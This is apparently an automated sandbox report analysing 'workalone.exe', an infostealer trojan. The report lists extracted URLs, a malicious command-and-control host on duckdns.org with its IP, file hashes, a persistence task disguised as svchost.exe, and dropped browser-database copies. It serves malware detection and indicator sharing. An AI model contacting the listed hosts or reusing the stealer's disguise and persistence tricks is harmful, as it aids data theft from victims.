http://schemas.datacontract.org/2004/07/	workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/t_	workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://saleshor12.duckdns.org:46539	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp1B56.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/envelope/D	workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://saleshor12.duckdns.org	workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
http://ns.adobe.c/g	workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnviron	workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
http://tempuri.org/Endpoint/SetEnvironment	workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmp1B56.tmp.1.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr	false		high
https://api.ipify.orgcookies//settinString.Removeg	workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/0	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp1B56.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.ado/1	workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://saleshor12.duckdns.org:	workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
85.208.136.178	saleshor12.duckdns.org	Germany		33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756291
Start date and time:	2022-11-30 00:06:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	workalone.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/29@5/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:07:08	Task Scheduler	Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
00:07:54	API Interceptor	95x Sleep call for process: workalone.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Get hash	malicious	Browse	141.98.6.102
	SecuriteInfo.com.Win32.CrypterX-gen.3242.29307.exe	Get hash	malicious	Browse	171.22.30.147
	SecuriteInfo.com.Win32.PWSX-gen.7894.18041.exe	Get hash	malicious	Browse	171.22.30.164
	MV COMMON CALYPSO.xls	Get hash	malicious	Browse	171.22.30.164
	Order Spec.PDF.js	Get hash	malicious	Browse	45.139.105.174
	iDhfdMWSQB_movar.js	Get hash	malicious	Browse	45.139.105.174
	Parts_Photos.js	Get hash	malicious	Browse	45.139.105.174
	wamafa.js	Get hash	malicious	Browse	45.139.105.174
	LPO-17-006AD.js	Get hash	malicious	Browse	45.139.105.174
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	QQt3XHWcOQ.exe	Get hash	malicious	Browse	171.22.30.147
	DHL Package Delivery_pdf.exe	Get hash	malicious	Browse	171.22.30.164
	HpBUsbfKoI.exe	Get hash	malicious	Browse	171.22.30.164
	RFQ.xls	Get hash	malicious	Browse	171.22.30.164
	NEW ORDER PO137810205.xls	Get hash	malicious	Browse	171.22.30.147

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	612
Entropy (8bit):	5.33730556823153
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
MD5:	F06804B809C3212C7F29ABA89E9FAF16
SHA1:	B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
SHA-256:	E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
SHA-512:	53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\tmp10B8.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp10E8.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B45.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B56.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4075.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4D35.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4D74.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6FB4.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6FE4.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7EB6.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp82DA.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8319.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp93B7.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\Temp\tmpA720.tmp

Download File

Process:	C:\Users\user\Desktop\workalone.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
